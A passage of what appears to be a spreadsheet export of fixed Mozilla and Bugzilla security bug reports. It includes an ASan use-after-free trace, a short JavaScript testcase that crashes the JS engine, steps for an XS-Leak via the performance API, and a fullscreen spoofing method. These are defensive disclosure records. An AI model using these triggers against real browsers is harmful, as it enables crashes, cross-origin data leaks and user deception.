    #6 0x7fdcfe895d87 in nsTHashtable&lt;gfxFontCache::HashEntry&gt;::GetEntry(gfxFontCache::Key const&amp;) const ../../dist/include/nsTHashtable.h:147
    #7 0x7fdcfe897532 in gfxFontCache::DestroyFont(gfxFont*) gfx/thebes/gfxFont.cpp:1321
    #8 0x7fdcfe8965da in gfxFontCache::NotifyExpired(gfxFont*) gfx/thebes/gfxFont.cpp:1314
    #9 0x7fdcfe9470da in nsExpirationTracker&lt;gfxFont, 3u&gt;::AgeOneGeneration() ../../dist/include/nsExpirationTracker.h:188
    #10 0x7fdcfe9466b3 in nsExpirationTracker&lt;gfxFont, 3u&gt;::TimerCallback(nsITimer*, void*) ../../dist/include/nsExpirationTracker.h:311
    #11 0x7fdcfe2c6832 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:473
    #12 0x7fdcfe2c7d3a in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:556
    #13 0x7fdcfe28b440 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #14 0x7fdcfdf1c2bb in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #15 0x7fdcfc8c7fbd in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:117
    #16 0x7fdcfe564ab1 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:208
    #17 0x7fdcfe5648e6 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:201
    #18 0x7fdcfe5647cb in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:175
    #19 0x7fdcfbd6c3ea in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #20 0x7fdcfa9a3df4 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:290
    #21 0x7fdcf0c7823d in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3782
    #22 0x7fdcf0c7e0b5 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3848
    #23 0x7fdcf0c80f64 in XRE_main toolkit/xre/nsAppRunner.cpp:3923
    #24 0x40baa3 in do_main(int, char**) browser/app/nsBrowserApp.cpp:174
    #25 0x4091e5 in main browser/app/nsBrowserApp.cpp:279
    #26 0x7fdd0f01b76c in ?? ??:0
0x7fdcc8f3a498 is located 24 bytes inside of 392-byte region [0x7fdcc8f3a480,0x7fdcc8f3a608)
freed by thread T0 here:
    #0 0x4c3580 in __interceptor_free ??:?
    #1 0x7fdd0be93406 in moz_free memory/mozalloc/mozalloc.cpp:51
    #2 0x7fdcfea9372d in operator delete(void*) ../../dist/include/mozilla/mozalloc.h:224
    #3 0x7fdcfe897716 in gfxFontCache::DestroyFont(gfxFont*) gfx/thebes/gfxFont.cpp:1326
    #4 0x7fdcfe8965da in gfxFontCache::NotifyExpired(gfxFont*) gfx/thebes/gfxFont.cpp:1314
    #5 0x7fdcfe9470da in nsExpirationTracker&lt;gfxFont, 3u&gt;::AgeOneGeneration() ../../dist/include/nsExpirationTracker.h:188
    #6 0x7fdcfe9466b3 in nsExpirationTracker&lt;gfxFont, 3u&gt;::TimerCallback(nsITimer*, void*) ../../dist/include/nsExpirationTracker.h:311
    #7 0x7fdcfe2c6832 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:473
    #8 0x7fdcfe2c7d3a in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:556
    #9 0x7fdcfe28b440 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #10 0x7fdcfdf1c2bb in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #11 0x7fdcfc8c7fbd in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:117
    #12 0x7fdcfe564ab1 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:208
    #13 0x7fdcfe5648e6 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:201
    #14 0x7fdcfe5647cb in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:175
    #15 0x7fdcfbd6c3ea in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #16 0x7fdcfa9a3df4 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:290
    #17 0x7fdcf0c7823d in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3782
    #18 0x7fdcf0c7e0b5 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3848
    #19 0x7fdcf0c80f64 in XRE_main toolkit/xre/nsAppRunner.cpp:3923
    #20 0x40baa3 in do_main(int, char**) browser/app/nsBrowserApp.cpp:174
    #21 0x4091e5 in main browser/app/nsBrowserApp.cpp:279
    #22 0x7fdd0f01b76c in ?? ??:0
previously allocated by thread T0 here:
    #0 0x4c3640 in malloc ??:?
    #1 0x7fdd0be9355a in moz_xmalloc memory/mozalloc/mozalloc.cpp:57
    #2 0x7fdcfea9b49c in operator new(unsigned long) ../../dist/include/mozilla/mozalloc.h:200
    #3 0x7fdcfea8c6d0 in gfxFcFontSet::GetFontAt(unsigned int, gfxFontStyle const*) gfx/thebes/gfxPangoFonts.cpp:1203
    #4 0x7fdcfea8b6d8 in gfxPangoFontGroup::GetBaseFontSet() gfx/thebes/gfxPangoFonts.cpp:2503
    #5 0x7fdcfea8b038 in gfxPangoFontGroup::GetBaseFont() gfx/thebes/gfxPangoFonts.cpp:1936
    #6 0x7fdcfea8ca32 in gfxPangoFontGroup::GetFontAt(int) gfx/thebes/gfxPangoFonts.cpp:1954
    #7 0x7fdcf24ae390 in nsFontMetrics::GetMetrics() const gfx/src/nsFontMetrics.cpp:128
    #8 0x7fdcf24af6fe in nsFontMetrics::ExternalLeading() gfx/src/nsFontMetrics.cpp:191
    #9 0x7fdcf3017179 in GetNormalLineHeight(nsFontMetrics*) layout/generic/nsHTMLReflowState.cpp:2331
    #10 0x7fdcf3015eef in ComputeLineHeight(nsStyleContext*, int, float) layout/generic/nsHTMLReflowState.cpp:2389
    #11 0x7fdcf301521c in nsHTMLReflowState::CalcLineHeight(nsStyleContext*, int, float) layout/generic/nsHTMLReflowState.cpp:2411
    #12 0x7fdcf3014f08 in nsHTMLReflowState::CalcLineHeight() const layout/generic/nsHTMLReflowState.cpp:2400
    #13 0x7fdcf2db4b27 in nsBlockReflowState layout/generic/nsBlockReflowState.cpp:113
    #14 0x7fdcf2d21d1c in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:998
    #15 0x7fdcf2dafdb0 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:268
    #16 0x7fdcf2d53101 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3090
    #17 0x7fdcf2d47ee2 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:2473
    #18 0x7fdcf2d2f2e7 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:1993
    #19 0x7fdcf2d2259d in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1045
    #20 0x7fdcf2dafdb0 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:268
    #21 0x7fdcf2d53101 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3090
    #22 0x7fdcf2d47ee2 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:2473
    #23 0x7fdcf2d2f2e7 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:1993
    #24 0x7fdcf2d2259d in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1045
Shadow byte and word:
  0x1ffb991e7493: fd
  0x1ffb991e7490: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffb991e7470: fa fa fa fa fa fa fa fa
  0x1ffb991e7478: fa fa fa fa fa fa fa fa
  0x1ffb991e7480: fa fa fa fa fa fa fa fa
  0x1ffb991e7488: fa fa fa fa fa fa fa fa
=&gt;0x1ffb991e7490: fd fd fd fd fd fd fd fd
  0x1ffb991e7498: fd fd fd fd fd fd fd fd
  0x1ffb991e74a0: fd fd fd fd fd fd fd fd
  0x1ffb991e74a8: fd fd fd fd fd fd fd fd
  0x1ffb991e74b0: fd fd fd fd fd fd fd fd
Stats: 252M malloced (278M for red zones) by 421919 calls
Stats: 43M realloced by 24773 calls
Stats: 228M freed by 300591 calls
Stats: 96M really freed by 189262 calls
Stats: 492M (126043 full pages) mmaped in 123 calls
  mmaps   by size class: 8:294894; 9:32764; 10:12285; 11:14329; 12:3072; 13:1536; 14:1280; 15:256; 16:1152; 17:1280; 18:144; 19:40; 20:24;
  mallocs by size class: 8:351457; 9:34855; 10:9666; 11:16641; 12:2693; 13:1915; 14:1554; 15:317; 16:1289; 17:1310; 18:159; 19:41; 20:22;
  frees   by size class: 8:246111; 9:26679; 10:6463; 11:13396; 12:1839; 13:1717; 14:1390; 15:267; 16:1233; 17:1294; 18:144; 19:39; 20:19;
  rfrees  by size class: 8:165441; 9:9318; 10:2157; 11:8872; 12:662; 13:589; 14:588; 15:146; 16:1045; 17:414; 18:25; 19:4; 20:1;
Stats: malloc large: 1532 small slow: 2354
==6069== ABORTING</t>
        </is>
      </c>
      <c r="X2467" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2468">
      <c r="A2468" t="n">
        <v>1072174</v>
      </c>
      <c r="B2468" t="inlineStr">
        <is>
          <t>2014-09-24 02:02:20 -0700</t>
        </is>
      </c>
      <c r="C2468" t="inlineStr">
        <is>
          <t>XrayToString assumes that there are only two XrayTrait types</t>
        </is>
      </c>
      <c r="D2468" t="inlineStr">
        <is>
          <t>2016-02-16 16:14:32 -0800</t>
        </is>
      </c>
      <c r="E2468" t="n">
        <v>1</v>
      </c>
      <c r="F2468" t="n">
        <v>1</v>
      </c>
      <c r="G2468" t="n">
        <v>3</v>
      </c>
      <c r="H2468" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2468" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2468" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2468" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2468" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2468" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2468" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2468" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2468" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+]</t>
        </is>
      </c>
      <c r="Q2468" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2468" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2468" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T2468" t="n">
        <v>1</v>
      </c>
      <c r="U2468" t="n">
        <v>0</v>
      </c>
      <c r="V2468" t="n">
        <v>14</v>
      </c>
      <c r="W2468" t="inlineStr">
        <is>
          <t>I noticed this while reviewing peterv's patches in bug 787070. The XrayToString method currently checks that we have an XrayWrapper, handles DOMXrays, and then assumes that we have an XPCWrappedNativeXray. If this were done with a JSXray, we'd end up casting arbitrary bits of the JSObject layout to an XPCWrappedNative* and dereferencing it. :-(
This is mitigated somewhat by the fact that Xrays generally aren't exposed to the web. But they are exposed to sandboxes, and we run enough untrusted code in sandboxes that I think this is sec-high.</t>
        </is>
      </c>
      <c r="X2468" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2469">
      <c r="A2469" t="n">
        <v>1768583</v>
      </c>
      <c r="B2469" t="inlineStr">
        <is>
          <t>2022-05-09 23:46:45 -0700</t>
        </is>
      </c>
      <c r="C2469" t="inlineStr">
        <is>
          <t>Fetch requests with mode cors and credentials leak whether the request redirected or not via performanceAPI</t>
        </is>
      </c>
      <c r="D2469" t="inlineStr">
        <is>
          <t>2023-01-16 20:44:18 -0800</t>
        </is>
      </c>
      <c r="E2469" t="n">
        <v>1</v>
      </c>
      <c r="F2469" t="n">
        <v>1</v>
      </c>
      <c r="G2469" t="n">
        <v>3</v>
      </c>
      <c r="H2469" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2469" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2469" t="inlineStr">
        <is>
          <t>Performance</t>
        </is>
      </c>
      <c r="K2469" t="inlineStr">
        <is>
          <t>Firefox 100</t>
        </is>
      </c>
      <c r="L2469" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2469" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2469" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2469" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2469" t="inlineStr">
        <is>
          <t>[adv-main103+]</t>
        </is>
      </c>
      <c r="Q2469" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2469" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2469" t="inlineStr">
        <is>
          <t>103 Branch</t>
        </is>
      </c>
      <c r="T2469" t="n">
        <v>1</v>
      </c>
      <c r="U2469" t="n">
        <v>0</v>
      </c>
      <c r="V2469" t="n">
        <v>10</v>
      </c>
      <c r="W2469" t="inlineStr">
        <is>
          <t>Created attachment 9275797
fetch_leak.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Steps to reproduce:
1. Perform a fetch request to a cross-origin URL that redirects (mode: "cors", credentials: "include")
2. Check the outcome of `performanceAPI.getEntriesByName(redirect_url)` 
3. Perform a fetch request to a cross-origin URL that does not redirect (mode: "cors", credentials: "include")
4. Check the outcome of `performanceAPI.getEntriesByName(no_redirect_url)` 
Open the attached HTML document for an interactive example.
Actual results:
The browser does not create an performanceAPI entry for URLs that redirect, the browser creates an performanceAPI entry for URLs that do not redirect.
With this method one can perform XS-Leaks if a URL only redirects depending on some user state. While cross-origin redirects can also be detected using other methods (e.g., CSP and securitypolicyviolation), this method can also detects same-origin redirects.
Expected results:
No redirect information should be leaked cross-origin.
Either no entry should be created for both URLs (the behavior in WebKit), or a default entry should be created for both URLs (the behavior in Chromium).</t>
        </is>
      </c>
      <c r="X2469" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2470">
      <c r="A2470" t="n">
        <v>986864</v>
      </c>
      <c r="B2470" t="inlineStr">
        <is>
          <t>2014-03-22 14:51:24 -0700</t>
        </is>
      </c>
      <c r="C2470" t="inlineStr">
        <is>
          <t>Crash [@ memmove] or [@ mozilla::PodCopy] or [@ js_NewStringCopyN] or Assertion failure: PointerRangeSize(src, static_cast&lt;const T*&gt;(dst)) &gt;= nelem, at dist/include/mozilla/PodOperations.h</t>
        </is>
      </c>
      <c r="D2470" t="inlineStr">
        <is>
          <t>2015-08-30 12:00:50 -0700</t>
        </is>
      </c>
      <c r="E2470" t="n">
        <v>1</v>
      </c>
      <c r="F2470" t="n">
        <v>1</v>
      </c>
      <c r="G2470" t="n">
        <v>3</v>
      </c>
      <c r="H2470" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2470" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2470" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2470" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2470" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2470" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2470" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2470" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2470" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main29+]</t>
        </is>
      </c>
      <c r="Q2470" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2470" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2470" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T2470" t="n">
        <v>1</v>
      </c>
      <c r="U2470" t="n">
        <v>0</v>
      </c>
      <c r="V2470" t="n">
        <v>19</v>
      </c>
      <c r="W2470" t="inlineStr">
        <is>
          <t>Created attachment 8395285
debug and opt stacks
function x() {}
for (var j = 0; j &lt; 99999; ++j) {
    (function() {
        x += x.watch("endsWith", SharedArrayBuffer);
        return 0 &gt;&gt; Function(x)
    })()
}
crashes js debug shell on m-c changeset 573ef29c7a9f with --ion-eager --ion-parallel-compile=off at memmove with mozilla::PodCopy and js_NewStringCopyN on the stack. It also crashes js opt shell at memmove with js_NewStringCopyN on the stack.
Sometimes this assertion pops up: Assertion failure: PointerRangeSize(src, static_cast&lt;const T*&gt;(dst)) &gt;= nelem, at dist/include/mozilla/PodOperations.h
s-s because such varying signatures are scary.
My debug configure flags are:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --enable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
My opt configure flags are:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
=== Tinderbox Build Bisection Results by autoBisect ===
The "good" changeset has the timestamp "20140226135810" and the hash "ac9709133b27".
The "bad" changeset has the timestamp "20140226135912" and the hash "7bb98e166b5b".
Likely regression window: https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=ac9709133b27&amp;tochange=7bb98e166b5b
Sean, only bug 933001 is on the stack, is it a likely regressor?</t>
        </is>
      </c>
      <c r="X2470" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2471">
      <c r="A2471" t="n">
        <v>235510</v>
      </c>
      <c r="B2471" t="inlineStr">
        <is>
          <t>2004-02-24 18:35:49 -0800</t>
        </is>
      </c>
      <c r="C2471" t="inlineStr">
        <is>
          <t>Password exposed in URL to chart image if login required to access a chart</t>
        </is>
      </c>
      <c r="D2471" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:38 -0800</t>
        </is>
      </c>
      <c r="E2471" t="n">
        <v>1</v>
      </c>
      <c r="F2471" t="n">
        <v>1</v>
      </c>
      <c r="G2471" t="n">
        <v>4</v>
      </c>
      <c r="H2471" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2471" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2471" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K2471" t="inlineStr">
        <is>
          <t>2.17.6</t>
        </is>
      </c>
      <c r="L2471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2471" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2471" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2471" t="inlineStr">
        <is>
          <t>[does not affect 2.16.x] [fixed in 2.18rc1]</t>
        </is>
      </c>
      <c r="Q2471" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2471" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2471" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2471" t="n">
        <v>1</v>
      </c>
      <c r="U2471" t="n">
        <v>0</v>
      </c>
      <c r="V2471" t="n">
        <v>20</v>
      </c>
      <c r="W2471" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1) View a new series-based chart.
2) Bookmark the results page.
3) Log out of Bugzilla.
4) Access the bookmark.  You'll be prompted to log in.
5) Log in.
6) View source on the resulting chart page.
Actual results:
The login ID and password are included in the query string of the URL to the
image (thus also showing up in web server logs).
Expected results:
The login ID and password should not be included.</t>
        </is>
      </c>
      <c r="X2471" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2472">
      <c r="A2472" t="n">
        <v>1402363</v>
      </c>
      <c r="B2472" t="inlineStr">
        <is>
          <t>2017-09-22 08:55:11 -0700</t>
        </is>
      </c>
      <c r="C2472" t="inlineStr">
        <is>
          <t>when a redirect is blocked for mixed content blocking the original redirect response is returned instead</t>
        </is>
      </c>
      <c r="D2472" t="inlineStr">
        <is>
          <t>2018-11-05 14:01:29 -0800</t>
        </is>
      </c>
      <c r="E2472" t="n">
        <v>1</v>
      </c>
      <c r="F2472" t="n">
        <v>1</v>
      </c>
      <c r="G2472" t="n">
        <v>3</v>
      </c>
      <c r="H2472" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2472" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2472" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2472" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L2472" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2472" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2472" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2472" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2472" t="inlineStr">
        <is>
          <t>[tor][domsecurity-active][adv-main57+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2472" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2472" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2472" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T2472" t="n">
        <v>1</v>
      </c>
      <c r="U2472" t="n">
        <v>0</v>
      </c>
      <c r="V2472" t="n">
        <v>39</v>
      </c>
      <c r="W2472" t="inlineStr">
        <is>
          <t>Jake Archibald at google noticed some weird behavior.  See this demo:
  https://firefox-redirect-bug.glitch.me/
Source code is at:
  https://glitch.com/edit/#!/firefox-redirect-bug?path=public/script.js:1:0
In this case he is trying to fail a fetch() call by redirecting from an https:// origin to an http:// origin.  This does produce the failure message:
  Blocked loading mixed active content “http://example.com/”
But the fetch() succeeds and the 302 response is returned instead.
I instrumented FetchDriver a bit and its actually not seeing an AsyncOnChannelRedirect() call.  Instead its just getting an OnStartRequest() with a channel with a successful mStatus.
Christoph, is this a problem with our AsyncOpen2() security checks?  Or is it possible an http cache issue, Honza?
I'm marking this a secure bug since Jake told me that some sites include private information in redirects that should not be exposed to scripts.</t>
        </is>
      </c>
      <c r="X2472" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2473">
      <c r="A2473" t="n">
        <v>1821886</v>
      </c>
      <c r="B2473" t="inlineStr">
        <is>
          <t>2023-03-11 22:24:22 -0800</t>
        </is>
      </c>
      <c r="C2473" t="inlineStr">
        <is>
          <t>Alerts break exiting non-DOM fullscreen leading to spoof using window prompt/alert</t>
        </is>
      </c>
      <c r="D2473" t="inlineStr">
        <is>
          <t>2024-05-30 11:06:46 -0700</t>
        </is>
      </c>
      <c r="E2473" t="n">
        <v>1</v>
      </c>
      <c r="F2473" t="n">
        <v>1</v>
      </c>
      <c r="G2473" t="n">
        <v>3</v>
      </c>
      <c r="H2473" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2473" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2473" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K2473" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2473" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2473" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2473" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2473" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2473" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main115+]</t>
        </is>
      </c>
      <c r="Q2473" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2473" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2473" t="inlineStr">
        <is>
          <t>115 Branch</t>
        </is>
      </c>
      <c r="T2473" t="n">
        <v>1</v>
      </c>
      <c r="U2473" t="n">
        <v>0</v>
      </c>
      <c r="V2473" t="n">
        <v>29</v>
      </c>
      <c r="W2473" t="inlineStr">
        <is>
          <t>Created attachment 9322583
bandicam 2023-03-12 13-04-02-922.mp4
i found vulnerabilty when using zoom feature using press  Fn+F11 or F11 on keyboard   , the web page can the webpage will go fullscreen,
and  when it will exit fullscreen mode user must press Fn+F11 or F11 again. This will be used to spoof by using a window prompt / alert (do not exit fullscreen mode when pressing f11) so that the victim will think they have exited fullscreen mode
1. open pocfullscreen.html
2. press Fn+F11 or F11 on keyboard  to using zoom feature (fullscreen)
3  press Fn+F11 or F11  on keyboard again to exit zoom (fullscreen) (it show alert and not exit on fullscreen mode it can spoof )
mitigation:
- when using zoom feature (fullscreen) show notification fullscreen</t>
        </is>
      </c>
      <c r="X2473" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2474">
      <c r="A2474" t="n">
        <v>509075</v>
      </c>
      <c r="B2474" t="inlineStr">
        <is>
          <t>2009-08-07 11:18:08 -0700</t>
        </is>
      </c>
      <c r="C2474" t="inlineStr">
        <is>
          <t>Crash [@ js_ValueToString]</t>
        </is>
      </c>
      <c r="D2474" t="inlineStr">
        <is>
          <t>2010-11-06 18:30:26 -0700</t>
        </is>
      </c>
      <c r="E2474" t="n">
        <v>1</v>
      </c>
      <c r="F2474" t="n">
        <v>1</v>
      </c>
      <c r="G2474" t="n">
        <v>3</v>
      </c>
      <c r="H2474" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2474" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2474" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2474" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2474" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2474" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2474" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2474" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2474" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2474" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2474" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2474" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2474" t="n">
        <v>1</v>
      </c>
      <c r="U2474" t="n">
        <v>0</v>
      </c>
      <c r="V2474" t="n">
        <v>18</v>
      </c>
      <c r="W2474" t="inlineStr">
        <is>
          <t>Created attachment 393222
testcase</t>
        </is>
      </c>
      <c r="X2474" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2475">
      <c r="A2475" t="n">
        <v>10929</v>
      </c>
      <c r="B2475" t="inlineStr">
        <is>
          <t>1999-07-30 14:07:15 -0700</t>
        </is>
      </c>
      <c r="C2475" t="inlineStr">
        <is>
          <t>{feature}Tabbing on bottom-right most cell in a table does not add a new row</t>
        </is>
      </c>
      <c r="D2475" t="inlineStr">
        <is>
          <t>2017-02-03 12:10:54 -0800</t>
        </is>
      </c>
      <c r="E2475" t="n">
